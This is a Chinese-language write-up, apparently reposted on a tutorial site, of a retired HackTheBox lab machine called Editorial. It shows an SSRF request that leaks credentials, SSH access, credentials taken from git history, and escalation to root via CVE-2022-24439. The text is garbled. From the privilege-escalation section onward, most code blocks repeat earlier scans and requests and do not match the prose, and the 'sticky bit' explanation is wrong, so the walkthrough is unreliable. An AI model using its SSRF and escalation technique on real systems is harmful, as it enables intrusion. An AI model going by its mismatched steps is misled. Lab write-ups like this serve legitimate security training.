搜尋
首頁後端開發Python教學HackTheBox - Writeup 社論 [已退休]

HackTheBox - Writeup 社論 [已退休]

Barbara Streisand
Barbara Streisand
Oct 20, 2024 am 06:12 AM

在這篇文章中,我們將探索一個簡單的 Linux 機器,稱為Editorial。該機器利用了以下漏洞及利用技術:

  • 伺服器端請求偽造 (SSRF)
  • 資訊外洩
  • Git 技巧
  • CVE-2022-24439 - 遠端執行程式碼 (RCE)

偵察和用戶旗幟

讓我們先使用 nmap 掃描目標以尋找開放連接埠:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/boardlight]
└─# nmap -sS --open -Pn 10.129.115.37
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-15 15:06 EDT
Nmap scan report for 10.129.115.37 (10.129.115.37)
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

我們有運行 ssh 的連接埠 22 和運行 http 伺服器的連接埠 80。
透過 IP 存取連接埠 80,我們被重定向到 editorial.htb,讓我們將此主機新增到我們的 /etc/hosts 中。

透過此我們可以存取以下內容:

HackTheBox - Writeup Editorial [Retired]

該網站是一家圖書出版商。在可用選項中,我們找到以下頁面:

HackTheBox - Writeup Editorial [Retired]

在這裡我們可以將書籍寄給出版商。發送可以透過兩種方式完成,本地上傳檔案或透過 url 上傳。

傳送檔案時,我們會被重新導向到與此類似的端點:

  • http://editorial.htb/static/uploads/0483497c-293d-44a4-87af-46a85f20cb60 透過造訪該 URL,我們先前以 PDF 形式發送的文件將被下載。

分析這兩個選項,我們在提供本地 URL 時發現 SSRF,發送以下 URL 作為負載:http://127.0.0.1:5000

這樣我們就可以下載文件,並且我們有 json 格式的以下內容:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/editorial]
└─# jq . requests-result/0483497c-293d-44a4-87af-46a85f20cb60
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

這裡我們有幾個可以探索的端點,為此我們將使用 burp suite(它已經在後台運行)來發出新請求。
首先讓我們專注於端點 /api/latest/metadata/messages/authors,它具有以下功能:檢索發送給我們的新作者的歡迎訊息

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------346249403126403154753644150452
Content-Length: 401
Origin: http://editorial.htb
Connection: close
Referer: http://editorial.htb/upload

-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/api/latest/metadata/messages/authors
-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------346249403126403154753644150452--

這樣我們就有了以下報酬:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 51

static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f

現在讓我們對此端點執行 get 請求:

GET /static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://editorial.htb/upload

因此我們得到以下回報:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:42 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: close
Content-Disposition: inline; filename=413c49ad-8adb-4bbb-9579-8a13e870ff5f
Last-Modified: Sat, 22 Jun 2024 11:53:31 GMT
Cache-Control: no-cache
ETag: "1719057211.219647-506-4209449183"

{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

我們再次得到了 json 格式的回傳。在這裡,我們有一條針對新作者的歡迎訊息以及使用者名稱和密碼:
使用者名稱: dev
密碼: dev080217_devAPI!@

使用此使用者名稱和密碼,我們可以透過 ssh 存取我們的目標:

┌──(root㉿kali)-[/home/kali]
└─# ssh dev@editorial.htb
The authenticity of host 'editorial.htb (10.129.101.138)' can't be established.
ED25519 key fingerprint is SHA256:YR+ibhVYSWNLe4xyiPA0g45F4p1pNAcQ7+xupfIR70Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'editorial.htb' (ED25519) to the list of known hosts.
dev@editorial.htb's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jun 22 11:54:05 AM UTC 2024

  System load:           0.0
  Usage of /:            60.4% of 6.35GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.129.101.138
  IPv6 address for eth0: dead:beef::250:56ff:feb0:6c4b


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jun 10 09:11:03 2024 from 10.10.14.52
dev@editorial:~$

透過這個用戶,我們獲得了用戶標誌! 

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/boardlight]
└─# nmap -sS --open -Pn 10.129.115.37
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-15 15:06 EDT
Nmap scan report for 10.129.115.37 (10.129.115.37)
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

權限提升和 root 標誌

在使用者的主目錄dev中,我們有一個名為apps的目錄。訪問目錄我們有以下內容:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/editorial]
└─# jq . requests-result/0483497c-293d-44a4-87af-46a85f20cb60
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

只有一個名為 .git 的目錄。 .git目錄記錄了一個專案的所有變更,記錄了專案的整個歷史。
這樣我們就可以查看提交歷史記錄:

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------346249403126403154753644150452
Content-Length: 401
Origin: http://editorial.htb
Connection: close
Referer: http://editorial.htb/upload

-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/api/latest/metadata/messages/authors
-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------346249403126403154753644150452--

提交中有以下內容:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 51

static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f

從生產到開發的資料已降級,在這裡我們可以找到重要資訊。
要查看此提交的內容,我們將使用命令 git revert,該命令將恢復更改並將項目返回到此提交:

GET /static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://editorial.htb/upload

我們有一個名為app.py的文件,讓我們來看看它的內容:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:42 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: close
Content-Disposition: inline; filename=413c49ad-8adb-4bbb-9579-8a13e870ff5f
Last-Modified: Sat, 22 Jun 2024 11:53:31 GMT
Cache-Control: no-cache
ETag: "1719057211.219647-506-4209449183"

{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

這裡的端點與我們最初透過 SSRF 發現的端點類似。不同之處在於存取資料屬於另一個使用者:

使用者名稱:產品
密碼: 080217_Producti0n_2023! @

查看目標中擁有活動 shell 的用戶,我們有以下用戶:

┌──(root㉿kali)-[/home/kali]
└─# ssh dev@editorial.htb
The authenticity of host 'editorial.htb (10.129.101.138)' can't be established.
ED25519 key fingerprint is SHA256:YR+ibhVYSWNLe4xyiPA0g45F4p1pNAcQ7+xupfIR70Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'editorial.htb' (ED25519) to the list of known hosts.
dev@editorial.htb's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jun 22 11:54:05 AM UTC 2024

  System load:           0.0
  Usage of /:            60.4% of 6.35GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.129.101.138
  IPv6 address for eth0: dead:beef::250:56ff:feb0:6c4b


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jun 10 09:11:03 2024 from 10.10.14.52
dev@editorial:~$

有一個名為prod的使用者。我們可以使用這個新密碼來使用這個使用者:

dev@editorial:~$ ls -a
.  ..  apps  .bash_history  .bash_logout  .bashrc  .cache  .profile  user.txt
dev@editorial:~$ cat user.txt
389072ccb7be77e63a1590defe01750e

使用新用戶,我們可以看到我們可以使用 sudo 運行 python 腳本,這會授予我們 root 權限:

dev@editorial:~/apps$ ls -alh
total 12K
drwxrwxr-x 3 dev dev 4.0K Jun  5 14:36 .
drwxr-x--- 4 dev dev 4.0K Jun  5 14:36 ..
drwxr-xr-x 8 dev dev 4.0K Jun  5 14:36 .git

該指令是執行一個接受任何參數的Python腳本,由於星號*。
我們可以預覽腳本的內容,看看我們能夠執行什麼:

dev@editorial:~/apps$ git log
commit 8ad0f3187e2bda88bba85074635ea942974587e8 (HEAD -> master)
Author: dev-carlos.valderrama <dev-carlos.valderrama>
Date:   Sun Apr 30 21:04:21 2023 -0500

    fix: bugfix in api port endpoint

commit dfef9f20e57d730b7d71967582035925d57ad883
Author: dev-carlos.valderrama <dev-carlos.valderrama>
Date:   Sun Apr 30 21:01:11 2023 -0500

    change: remove debug and update api port

commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama>
Date:   Sun Apr 30 20:55:08 2023 -0500

    change(api): downgrading prod to dev

    * To use development environment.

commit 1e84a036b2f33c59e2390730699a488c65643d28
Author: dev-carlos.valderrama <dev-carlos.valderrama>
Date:   Sun Apr 30 20:51:10 2023 -0500

    feat: create api to editorial info

    * It (will) contains internal info about the editorial, this enable
       faster access to information.

commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama>
Date:   Sun Apr 30 20:48:43 2023 -0500

    feat: create editorial app

    * This contains the base of this project.
    * Also we add a feature to enable to external authors send us their
       books and validate a future post in our editorial.
</dev-carlos.valderrama></dev-carlos.valderrama></dev-carlos.valderrama></dev-carlos.valderrama></dev-carlos.valderrama>

我們沒有編輯該檔案的權限,只能執行。該腳本使用 Python os 和 sys 程式庫,可讓您在 Linux 上執行操作。
此腳本接受一個參數,為此使用 Python lib sys
使用 python lib os. 中的函數 chdir/opt/internal_apps/clone_changes

進行目錄更改

現在使用另一個名為 git 的 Python 函式庫,建立了一個 git init,它初始化了一個儲存庫。
腳本接受的參數必須是儲存庫,以便可以使用同一個 git lib 進行 git 複製。

我們可以搜尋這個函式庫中的漏洞,為此我們需要透過pip(這是一個Python套件管理器)來取得版本:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/boardlight]
└─# nmap -sS --open -Pn 10.129.115.37
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-15 15:06 EDT
Nmap scan report for 10.129.115.37 (10.129.115.37)
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

搜尋我們發現的漏洞CVE-2022-24439,這是由於使用者輸入驗證不充分而導致的遠端程式碼執行。
該漏洞由 Snyk 報告,並提供了 PoC。

我們可以更改 poc 以 root 身分讀取檔案或提升對 root 的存取權。

要讀取文件,我們可以執行以下指令:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/editorial]
└─# jq . requests-result/0483497c-293d-44a4-87af-46a85f20cb60
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

這樣我們就可以讀取根標誌了。

我們也可以在/bin/bash檔案中加入黏性位元,這樣我們就可以獲得root權限的shell。黏滯位元允許其他使用者在獲得檔案擁有者(在本例中為 root 使用者)許可的情況下使用該檔案或二進位檔案。加到 /bin/bash 我們得到一個 root 的 shell:

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------346249403126403154753644150452
Content-Length: 401
Origin: http://editorial.htb
Connection: close
Referer: http://editorial.htb/upload

-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/api/latest/metadata/messages/authors
-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------346249403126403154753644150452--

這樣我們就完成編輯機器了!

HackTheBox - Writeup Editorial [Retired]

以上是HackTheBox - Writeup 社論 [已退休]的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
相關文章
python中兩個列表的串聯替代方案是什麼?python中兩個列表的串聯替代方案是什麼?May 09, 2025 am 12:16 AM

可以使用多種方法在Python中連接兩個列表:1.使用 操作符,簡單但在大列表中效率低;2.使用extend方法,效率高但會修改原列表;3.使用 =操作符,兼具效率和可讀性;4.使用itertools.chain函數,內存效率高但需額外導入;5.使用列表解析,優雅但可能過於復雜。選擇方法應根據代碼上下文和需求。

Python:合併兩個列表的有效方法Python:合併兩個列表的有效方法May 09, 2025 am 12:15 AM

有多種方法可以合併Python列表:1.使用 操作符,簡單但對大列表不內存高效;2.使用extend方法,內存高效但會修改原列表;3.使用itertools.chain,適用於大數據集;4.使用*操作符,一行代碼合併小到中型列表;5.使用numpy.concatenate,適用於大數據集和性能要求高的場景;6.使用append方法,適用於小列表但效率低。選擇方法時需考慮列表大小和應用場景。

編譯的與解釋的語言:優點和缺點編譯的與解釋的語言:優點和缺點May 09, 2025 am 12:06 AM

CompiledLanguagesOffersPeedAndSecurity,而interneterpretledlanguages provideeaseafuseanDoctability.1)commiledlanguageslikec arefasterandSecureButhOnderDevevelmendeclementCyclesclesclesclesclesclesclesclesclesclesclesclesclesclesclesclesclesclesandentency.2)cransportedeplatectentysenty

Python:對於循環,最完整的指南Python:對於循環,最完整的指南May 09, 2025 am 12:05 AM

Python中,for循環用於遍歷可迭代對象,while循環用於條件滿足時重複執行操作。 1)for循環示例:遍歷列表並打印元素。 2)while循環示例:猜數字遊戲,直到猜對為止。掌握循環原理和優化技巧可提高代碼效率和可靠性。

python concatenate列表到一個字符串中python concatenate列表到一個字符串中May 09, 2025 am 12:02 AM

要將列表連接成字符串,Python中使用join()方法是最佳選擇。 1)使用join()方法將列表元素連接成字符串,如''.join(my_list)。 2)對於包含數字的列表,先用map(str,numbers)轉換為字符串再連接。 3)可以使用生成器表達式進行複雜格式化,如','.join(f'({fruit})'forfruitinfruits)。 4)處理混合數據類型時,使用map(str,mixed_list)確保所有元素可轉換為字符串。 5)對於大型列表,使用''.join(large_li

Python的混合方法:編譯和解釋合併Python的混合方法:編譯和解釋合併May 08, 2025 am 12:16 AM

pythonuseshybridapprace,ComminingCompilationTobyTecoDeAndInterpretation.1)codeiscompiledtoplatform-Indepententbybytecode.2)bytecodeisisterpretedbybythepbybythepythonvirtualmachine,增強效率和通用性。

了解python的' for”和' then”循環之間的差異了解python的' for”和' then”循環之間的差異May 08, 2025 am 12:11 AM

theKeyDifferencesBetnewpython's“ for”和“ for”和“ loopsare:1)” for“ loopsareIdealForiteringSequenceSquencesSorkNowniterations,而2)”,而“ loopsareBetterforConterContinuingUntilacTientInditionIntionismetismetistismetistwithOutpredefinedInedIterations.un

Python串聯列表與重複Python串聯列表與重複May 08, 2025 am 12:09 AM

在Python中,可以通過多種方法連接列表並管理重複元素:1)使用 運算符或extend()方法可以保留所有重複元素;2)轉換為集合再轉回列表可以去除所有重複元素,但會丟失原有順序;3)使用循環或列表推導式結合集合可以去除重複元素並保持原有順序。

See all articles

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

顯示更多

熱門文章

如何修復KB5055523無法在Windows 11中安裝?
4 週前ByDDD
如何修復KB5055518無法在Windows 10中安裝?
4 週前ByDDD
<🎜>:種植花園 - 完整的突變指南
2 週前ByDDD
<🎜>:泡泡膠模擬器無窮大 - 如何獲取和使用皇家鑰匙
3 週前By尊渡假赌尊渡假赌尊渡假赌
如何修復KB5055612無法在Windows 10中安裝?
3 週前ByDDD
顯示更多

熱工具

SAP NetWeaver Server Adapter for Eclipse

SAP NetWeaver Server Adapter for Eclipse

將Eclipse與SAP NetWeaver應用伺服器整合。

DVWA

DVWA

Damn Vulnerable Web App (DVWA) 是一個PHP/MySQL的Web應用程序,非常容易受到攻擊。它的主要目標是成為安全專業人員在合法環境中測試自己的技能和工具的輔助工具,幫助Web開發人員更好地理解保護網路應用程式的過程,並幫助教師/學生在課堂環境中教授/學習Web應用程式安全性。 DVWA的目標是透過簡單直接的介面練習一些最常見的Web漏洞,難度各不相同。請注意,該軟體中

MinGW - Minimalist GNU for Windows

MinGW - Minimalist GNU for Windows

這個專案正在遷移到osdn.net/projects/mingw的過程中,你可以繼續在那裡關注我們。 MinGW:GNU編譯器集合(GCC)的本機Windows移植版本,可自由分發的導入函式庫和用於建置本機Windows應用程式的頭檔;包括對MSVC執行時間的擴展,以支援C99功能。 MinGW的所有軟體都可以在64位元Windows平台上運作。

SublimeText3 Linux新版

SublimeText3 Linux新版

SublimeText3 Linux最新版

WebStorm Mac版

WebStorm Mac版

好用的JavaScript開發工具

顯示更多

熱門話題

Java教學
1664
14
CakePHP 教程
1421
52
Laravel 教程
1315
25
PHP教程
1266
29
C# 教程
1239
24
顯示更多